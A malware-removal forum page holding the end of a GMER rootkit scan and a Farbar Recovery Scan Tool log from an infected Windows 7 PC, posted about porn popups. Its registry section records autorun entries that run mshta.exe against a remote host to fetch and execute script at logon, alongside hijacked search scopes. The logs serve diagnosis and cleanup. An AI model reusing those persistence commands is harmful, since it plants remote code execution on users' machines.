.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!CreateWindowExW 7E42D0A3 5 Bytes JMP 3E2EDC24 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!UnhookWindowsHookEx 7E42D5F3 5 Bytes JMP 3E2546FC C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!DialogBoxIndirectParamW 7E432072 5 Bytes JMP 3E3E7997 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!MessageBoxIndirectA 7E43A082 5 Bytes JMP 3E3E78C9 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!DialogBoxParamA 7E43B144 5 Bytes JMP 3E3E7934 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!MessageBoxExW 7E450838 5 Bytes JMP 3E3E779A C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!MessageBoxExA 7E45085C 5 Bytes JMP 3E3E77FC C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!DialogBoxIndirectParamA 7E456D7D 5 Bytes JMP 3E3E79FA C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!MessageBoxIndirectW 7E4664D5 5 Bytes JMP 3E3E785E C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] ole32.dll!CreateBindCtx + B5F 774FF177 7 Bytes JMP 03A4091C
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] ole32.dll!CoCreateInstance 774FF1D4 5 Bytes JMP 3E2EDC80 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] ole32.dll!CoImpersonateClient + 51 77515228 7 Bytes JMP 03A4083A
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] ole32.dll!OleLoadFromStream 7752988B 5 Bytes JMP 3E3E7CFF C:\WINDOWS\system32\IEFRAME.dll

---- Devices - GMER 2.1 ----

AttachedDevice \Driver\Tcpip \Device\Ip SYMTDI.SYS
AttachedDevice \Driver\Tcpip \Device\Tcp SYMTDI.SYS
AttachedDevice \Driver\Tcpip \Device\Udp SYMTDI.SYS
AttachedDevice \Driver\Tcpip \Device\RawIp SYMTDI.SYS
AttachedDevice \FileSystem\Fastfat \Fat fltmgr.sys

---- Registry - GMER 2.1 ----

Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\9040211900063D11C8EF10054038389C\Usage@ProductFiles 1151798115
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\9040211900063D11C8EF10054038389C\Usage@ProductNonBootFiles 1151795817
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\9040211900063D11C8EF10054038389C\Usage@WORDFiles 1151801945
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\9040211900063D11C8EF10054038389C\Usage@ASSISTANTFiles 1151795995

---- EOF - GMER 2.1 ----

Attached Images
File Type: jpg System Mechanic - Pic.JPG (146.8 KB)
File Type: jpg System Config.JPG (60.8 KB)

More Japanese porn popups

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-05-2014
Ran by AIR (administrator) on AIR-HP on 10-05-2014 21:43:28
Running from C:\Users\AIR\Desktop
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: 0C04
Internet Explorer Version 11
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/down...an-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/down...an-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic...ery-scan-tool/

==================== Processes (Whitelisted) =================

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgcsrva.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Alipay Inc. ) C:\Program Files (x86)\alipay\alieditplus\AlipaySecSvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Nero AG) C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe
() C:\Program Files\Hewlett-Packard\HP Power Assistant\HPPA_Service.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEDICTUPDATE.EXE
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
(PDF Complete Inc) C:\Program Files (x86)\PDF Complete\pdfsvc.exe
(Motorola) C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
() C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmdb.exe
(SoftEther Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgemca.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
(阿里巴巴(中国)有限公司) C:\Program Files (x86)\alipay\SafeTransaction\TaobaoProtect.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Alipay Inc. ) C:\Program Files (x86)\alipay\SafeTransaction\Alipaybsm.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
(SoftEther Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe
(Microsoft Corporation) C:\Windows\System32\alg.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Motorola Mobility Inc.) C:\Program Files (x86)\Motorola Mobility\MotoCast\MotoCast.exe
(SoftEther Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON_P2B\Printer Software\Launcher\selaunch.exe
(Dropbox, Inc.) C:\Users\AIR\AppData\Roaming\Dropbox\bin\Dropbox.exe
() C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmpl.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgui.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\acrotray.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE
() C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmW.exe
() C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmwj.exe
() C:\Program Files (x86)\Motorola Mobility\MotoCast\bin\MotoCast-thumbnailer.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE
(Microsoft Corporation) C:\Windows\System32\prevhost.exe
() C:\Users\AIR\Desktop\63r8jur5.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
(WinZip Computing, S.L.) C:\Program Files\WinZip\WzPreviewer64.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-21] (Hewlett-Packard)
HKLM\...\Run: [IME14 CHT Setup] => C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEKLMG.EXE [110896 2012-03-14] (Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [SoftEther VPN Client UI Helper] => C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe [4178488 2013-11-24] (SoftEther Project at University of Tsukuba, Japan.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-11-24] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [PDF Complete] => C:\Program Files (x86)\PDF Complete\pdfsty.exe [656920 2011-02-01] (PDF Complete Inc)
HKLM-x32\...\Run: [LauncherMX14NF] => C:\Program Files (x86)\EPSON_P2B\Printer Software\Launcher\selaunch.exe [2268832 2012-07-02] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [MX14NF RUN] => C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmRun.exe [363168 2012-07-11] ()
HKLM-x32\...\Run: [StatusAutoRunMX14NF] => C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmpl.exe [3988128 2012-07-11] ()
HKLM-x32\...\Run: [IME14 CHT Setup] => C:\Program Files (x86)\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXE [81200 2012-03-14] (Microsoft Corporation)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-06] (Apple Inc.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2014\avgui.exe [5180432 2014-04-06] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1075296 2013-04-25] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Acrotray.exe [3478392 2013-09-05] (Adobe Systems Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-06] (Apple Inc.)
HKLM\...\RunOnce: [NCPluginUpdater] - "C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe" Update [21720 2014-04-22] (Hewlett-Packard)
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [720064 2013-04-22] (Microsoft Corporation)
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-11-20] (Apple Inc.)
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Run: [Facebook Update] => C:\Users\AIR\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2013-03-24] (Facebook Inc.)
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Run: [MotoCast] => C:\Program Files (x86)\Motorola Mobility\MotoCast\MotoLauncher.lnk [2013 2013-07-21] ()
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Run: [Google Update] => C:\Users\AIR\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2013-07-13] (Google Inc.)
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Run: [SystemBoot9o7OmIlsVd1uwfjSblhag36mw1fmoWHv] => mshta.exe http://dwy.toyncise.net/reg2.php?ccc...w1fmoWHv&log=1
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Run: [RegWrite9o7OmIlsVd1uwfjSblhag36mw1fmoWHv] => mshta.exe http://dwy.toyncise.net/set_inf2.php...hag36mw1fmoWHv
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\RunOnce: [RegWrite9o7OmIlsVd1uwfjSblhag36mw1fmoWHv] - mshta.exe http://dwy.toyncise.net/set_inf2.php...hag36mw1fmoWHv
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\MountPoints2: H - H:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\MountPoints2: {4fc53354-f18b-11e2-a623-00ac0597543e} - G:\Setup.exe
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\MountPoints2: {5dad2d0e-b107-11e3-a0a0-00ac0597543e} - H:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\MountPoints2: {ae55cb71-762d-11e2-893a-e06995db3242} - G:\setup.exe -a
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\MountPoints2: {ca36bf81-c86a-11e3-b715-00ac0597543e} - H:\HTC_Sync_Manager_PC.exe
Startup: C:\Users\AIR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\AIR\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\AIR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\傳送至 OneNote.lnk
ShortcutTarget: 傳送至 OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SoftEther VPN Client Manager Startup.lnk
ShortcutTarget: SoftEther VPN Client Manager Startup.lnk -> C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe (SoftEther Project at University of Tsukuba, Japan.)
GroupPolicyUsers\S-1-5-21-879570740-1523932123-957937009-1003\User: Group Policy restriction detected <======= ATTENTION

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.netvigator.com/~winway93/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://hk.msn.com/?ocid=OIE9HP
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - {8E7EAC92-D4AC-420A-8B51-77545AE61991} URL = http://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=U3&apn_dtid=OSJ000YYHK&apn_uid=C614F35D-D17F-4593-B723-D54AB06BEDBB&apn_sauid=E9889AB2-432E-44C5-A6B6-D10FE1596A18
SearchScopes: HKCU - {BE57C649-AC9B-4C19-BA82-DC400427FB85} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3289075&CUI=UN33388891595962207&UM=1
BHO: Lync Browser Helper - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation)
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Adobe Acrobat Create PDF Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL (Microsoft Corporation)
BHO: Adobe Acrobat Create PDF from Selection - {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Lync Browser Helper - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Adobe Acrobat Create PDF Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: Adobe Acrobat Create PDF from Selection - {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
DPF: HKLM-x32 {233C1507-6A77-46A4-9443-F871F945D258} http://download.macromedia.com/pub/s...irector/sw.cab
DPF: HKLM-x32 {3A2C8BC3-5B68-4AE5-81D6-6DC378708F3E} https://ibs.ncbchina.cn/perbank/cab/PassGuardCtrl.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload.adobe.com/pub/shoc...sh/swflash.cab
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL (Microsoft Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_13_0_0_206.dll ()
FF Plugin: @alipay.com/npAliSecCtrl - C:\Windows\SysWOW64\aliedit\3.7.0.0\npAliSecCtrl64.dll (Alipay.com Inc. )
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll (Adobe Systems)
FF Plugin: adobe.com/AdobeExManDetect - C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Win64Plugin\npAdobeExManDetectX64.dll (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_206.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer - C:\Windows\SysWOW64\Adobe\Director\np32dsw_1207148.dll (Adobe Systems, Inc.)
FF Plugin-x32: @alibaba.com/npwangwang;version=1.0 - C:\Program Files (x86)\AliWangWang\8.00.05C\npwangwang.dll ( )
FF Plugin-x32: @alipay.com/npalidcp - C:\Windows\system32\aliedit\3.7.0.0\npalidcp.dll No File
FF Plugin-x32: @alipay.com/npaliedit - C:\Windows\system32\aliedit\3.7.0.0\npaliedit.dll No File
FF Plugin-x32: @alipay.com/npAliSecCtrl - C:\Windows\system32\aliedit\3.7.0.0\npAliSecCtrl.dll No File
FF Plugin-x32: @alipay.com/NPComBrg701,version=1.0.2011.701 - C:\Windows\system32\itruscert\NPComBrg701.dll No File
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @microsoft.com/Lync,version=15.0 - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @qq.com/npchrome - C:\Program Files (x86)\Common Files\Tencent\Npchrome\npchrome.dll No File
FF Plugin-x32: @qq.com/npqscall - C:\Program Files (x86)\Common Files\Tencent\NPQSCALL\npqscall.dll No File
FF Plugin-x32: @qq.com/QQPhotoDrawEx - C:\Program Files (x86)\Tencent\Qzone\npQQPhotoDrawEx.dll No File
FF Plugin-x32: @qq.com/QzoneMusic - C:\Program Files (x86)\Tencent\QQMusic\QzoneMusic\npQzoneMusic.dll No File
FF Plugin-x32: @qq.com/TXSSO - C:\Program Files (x86)\Common Files\Tencent\TXSSO\1.2.2.1\Bin\npSSOAxCtrlForPTLogin.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Acrobat - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
